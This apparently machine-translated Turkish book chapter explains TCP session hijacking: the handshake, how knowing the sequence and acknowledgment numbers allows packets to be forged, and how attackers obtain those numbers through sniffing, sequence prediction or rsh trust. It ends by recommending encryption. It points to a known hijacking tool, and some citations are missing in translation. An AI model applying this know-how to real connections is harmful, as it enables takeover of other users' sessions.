TCP bağlantı ele geçirme saldırılarını gerçekleştirmek için çeşitli etkili yardımcı programlar oluşturulmuştur, ancak bunların tümü Unix platformu için uygulanmıştır ve Web sitelerinde bu yardımcı programlar yalnızca kaynak kodu biçiminde sunulmaktadır. Bu nedenle, bilgisayar korsanlığının asil amacının ikna olmuş uygulayıcıları olarak, TCP bağlantı kesme yöntemini kullanan saldırıların bizim için pek bir faydası yoktur. (Başkalarının program kodunu anlamak isteyenler http://www.cri.cz/~kra/index.html sitesine başvurabilir, buradan indirebilirsiniz kaynak Pavel Krauz'un tanınmış Hunt TCP bağlantı müdahale yardımcı programı).

Pratik araçların olmamasına rağmen TCP bağlantılarının ele geçirilmesi gibi ilginç bir konuyu göz ardı edemeyiz ve bu tür saldırıların bazı yönleri üzerinde duracağız. TCP paketinin yapısı ve TCP bağlantılarını kurma prosedürü hakkında bazı bilgiler bu kitabın Ek D'sinde verilmiştir, ancak burada şu soruya odaklanacağız: Bilgisayar korsanlarının TCP bağlantısına müdahale saldırıları gerçekleştirmesine tam olarak ne izin verir? Esas olarak ve'deki tartışmaya dayanarak bu konuyu daha ayrıntılı olarak ele alalım.

TCP protokolü (İletim Kontrol Protokolü), sanal bir iletişim kanalı üzerinden mantıksal bağlantılar kurmanıza olanak tanıyan temel OSI aktarım katmanı protokollerinden biridir. Bu kanal üzerinden paketler sıraları kaydedilerek iletilir ve alınır, paketlerin akışı kontrol edilir, bozuk paketlerin yeniden iletimi düzenlenir ve oturum sonunda iletişim kanalı kesilir. TCP protokolü, TCP/IP ailesindeki gelişmiş mesaj tanımlama ve bağlantı sistemine sahip tek çekirdek protokoldür.

Bir TCP paketini tanımlamak için, TCP başlığında aynı zamanda paket sayaçları olarak da görev yapan, sıra numarası ve onay numarası adı verilen iki adet 32 bit tanımlayıcı vardır. Ayrıca TCP paketinin kontrol bitleri adı verilen bir alanıyla daha ilgileneceğiz. Bu 6 bitlik alan aşağıdaki kontrol bitlerini içerir (soldan sağa sırayla):

URG - acil durum bayrağı;

ACK - onay bayrağı;

PSH - bayrak taşıyın;

RST - bağlantıyı yeniden kurma bayrağı;

SYN - senkronizasyon bayrağı;

FIN - bağlantı sonlandırma bayrağı.

TCP bağlantısı oluşturma prosedürüne bakalım.

1. Ana bilgisayar A'nın, Ana Bilgisayar B ile bir TCP bağlantısı oluşturması gerekiyorsa, ana bilgisayar A, Ana Bilgisayar B'ye aşağıdaki mesajı gönderir:

A -> B: SYN, ISSa

Bu, A ana bilgisayarı tarafından gönderilen mesajın SYN bayrağının (Senkronize sıra numarası) ayarlandığı ve sıra numarası alanının ilk 32 bit değer ISSa'ya (Başlangıç Sıra Numarası) ayarlandığı anlamına gelir.

2. Ana bilgisayar A'dan alınan isteğe yanıt olarak, Ana Bilgisayar B, SYN bitinin ve ACK bitinin ayarlandığı bir mesajla yanıt verir. Sıra numarası alanında, ana bilgisayar B, ilk sayaç değerini - ISSb'yi ayarlar; onay numarası alanı daha sonra ana bilgisayar A'dan ilk pakette alınan ISSa değerini bir artırılarak içerecektir. Yani B sunucusu şu mesajla yanıt verir:

B -> A: SYN, ACK, ISSb, ACK(ISSa+1)

3. Son olarak, ana bilgisayar A, ana bilgisayar B'ye bir mesaj gönderir; bu mesajda: ACK biti ayarlanır; sıra numarası alanı ISSa + 1 değerini içerir; Onay numarası alanı ISSb + 1 değerini içerir. Bundan sonra, A ve B ana bilgisayarları arasındaki TCP bağlantısının kurulduğu kabul edilir:

A -> B: ACK, ISSa+1, ACK(ISSb+1)

4. Artık A ana bilgisayarı, yeni oluşturulan sanal TCP kanalı üzerinden B ana bilgisayarına veri paketleri gönderebilir:

A -> B: ACK, ISSa+1, ACK(ISSb+1); VERİ

Burada DATA, veri anlamına gelir.

Yukarıda tartışılan bir TCP bağlantısı oluşturmaya yönelik algoritmadan, TCP abonelerinin ve bir TCP bağlantısının tek tanımlayıcılarının sıra numarası ve onay numarasının iki 32 bit parametresi - ISSa ve ISSb olduğu görülebilir. Bu nedenle, eğer bir bilgisayar korsanı ISSa ve ISSb alanlarının mevcut değerlerini bulmayı başarırsa, hiçbir şey onun sahte bir TCP paketi oluşturmasını engelleyemez. Bu, bir bilgisayar korsanının yalnızca belirli bir TCP bağlantısı için bir TCP paketinin ISSa ve ISSb parametrelerinin mevcut değerlerini seçmesi, paketi bu TCP bağlantısının istemcisi adına herhangi bir İnternet ana bilgisayarından göndermesi ve bu paketi göndermesi gerektiği anlamına gelir. doğru olarak algılanacaktır!

Bu tür TCP paket sahtekarlığının tehlikesi de önemlidir çünkü üst düzey FTP ve TELNET protokolleri TCP protokolüne dayalı olarak uygulanır ve FTP ve TELNET paket istemcilerinin tanımlanması tamamen TCP protokolüne dayalıdır.

Ayrıca FTP ve TELNET protokolleri, mesaj gönderenlerin IP adreslerini kontrol etmediğinden, sahte bir paket aldıktan sonra, FTP veya TELNET sunucuları, sahte pakette belirtilen hacker ana bilgisayarının IP adresine bir yanıt mesajı gönderecektir. Bundan sonra, bilgisayar korsanı ana bilgisayarı IP adresinden FTP veya TELNET sunucusuyla çalışmaya başlayacak, ancak yasal olarak bağlı bir kullanıcının haklarına sahip olacak ve bu kullanıcı da sayaçların uyumsuzluğu nedeniyle sunucuyla bağlantısını kaybedecek.

Dolayısıyla, yukarıda açıklanan saldırıyı gerçekleştirmek için gerekli ve yeterli koşul, TCP bağlantısını tanımlayan iki güncel 32 bitlik ISSa ve ISSb parametresinin bilinmesidir. Hadi düşünelim olası yollar onları almak. Bilgisayar korsanı ana bilgisayarının saldırıya uğrayan ağ segmentine bağlı olması durumunda, ISSa ve ISSb değerlerini elde etme görevi önemsizdir ve ağ trafiğinin analiz edilmesiyle çözülebilir. Bu nedenle, TCP protokolünün prensipte bir bağlantıyı ancak bir saldırganın üzerinden iletilen mesajları ele geçirmesinin imkansız olması durumunda korumaya izin verdiğini açıkça anlamak gerekir. bu bağlantı yani, yalnızca bilgisayar korsanı ana bilgisayarının TCP bağlantısının abone bölümünden farklı bir ağ bölümüne bağlı olması durumunda.

Bu nedenle, saldırgan ve hedefi farklı ağ segmentlerinde olduğunda, segmentler arası saldırılar bir bilgisayar korsanının en büyük ilgisini çeker. Bu durumda ISSa ve ISSb değerlerinin elde edilmesi görevi önemsiz değildir. Bu sorunu çözmek için şu anda yalnızca iki yöntem icat edildi.

Önceki ISSa ve ISSb değerlerinin ekstrapolasyonuyla TCP bağlantı parametrelerinin başlangıç değerinin matematiksel tahmini.

Unix rsh sunucularındaki TCP bağlantısı abonelerinin tanımlanmasında güvenlik açıklarından yararlanılıyor.

İlk görev, TCP protokolünün çeşitli ülkelerde uygulanmasına ilişkin derinlemesine çalışmalarla çözülür. işletim sistemleri ve artık tamamen teorik bir öneme sahip. İkinci sorun güvenlik açıkları kullanılarak çözüldü Unix sistemleri güvenilir ana bilgisayarları belirleyerek. (Belirli bir ana bilgisayar A ile ilgili olarak güvenilen, kullanıcısı, ana bilgisayar A'nın r-hizmetini kullanarak kimlik doğrulaması olmadan A ana bilgisayarına bağlanabilen bir ağ ana bilgisayarı B'dir). Bir bilgisayar korsanı, TCP paketlerinin parametrelerini değiştirerek güvenilir bir ana bilgisayarı taklit etmeye ve saldırıya uğrayan ana bilgisayarla TCP bağlantısını kesmeye çalışabilir.

Bütün bunlar çok ilginç ama bu tür araştırmaların pratik sonuçları henüz görünmüyor. Bu nedenle, bu konuyu daha derinlemesine incelemek isteyen herkese, yukarıda sunulan bilgilerin esas olarak alındığı kitaba yönelmelerini tavsiye ediyoruz.

Çözüm

Ağ verilerinin ele geçirilmesi, ağ korsanlığının en etkili yöntemidir ve bilgisayar korsanının ağda dolaşan hemen hemen tüm bilgileri elde etmesine olanak tanır. En büyük pratik gelişme, koklama araçlarıyla elde edilmiştir; ağları dinlemek; Bununla birlikte, trafiği bir bilgisayar korsanı ana bilgisayarına yönlendirmek amacıyla ağın normal işleyişine müdahale ederek gerçekleştirilen ağ verilerine müdahale etme yöntemlerini, özellikle de TCP bağlantılarını ele geçirme yöntemlerini göz ardı edemeyiz. Ancak uygulamada son bahsedilen yöntemler henüz yeterli gelişme göstermemiştir ve geliştirilmeleri gerekmektedir.

Bir anti-hacker, veri müdahalesinden tek kurtuluşun şifreleme olduğunu bilmelidir; kriptografik koruma yöntemleri. Ağ üzerinden bir mesaj gönderirken, önceden ağın kablo sisteminin kesinlikle savunmasız olduğunu ve ağa bağlı herhangi bir bilgisayar korsanının, iletilen tüm gizli mesajları buradan yakalayabileceğini varsaymalısınız. Bu sorunu çözmek için iki teknoloji vardır: bir VPN ağı oluşturmak ve mesajların kendilerini şifrelemek. Tüm bu görevleri PGP Desktop Security yazılım paketini kullanarak çözmek çok kolaydır (açıklaması örneğin içinde bulunabilir).

Kategoride popüler: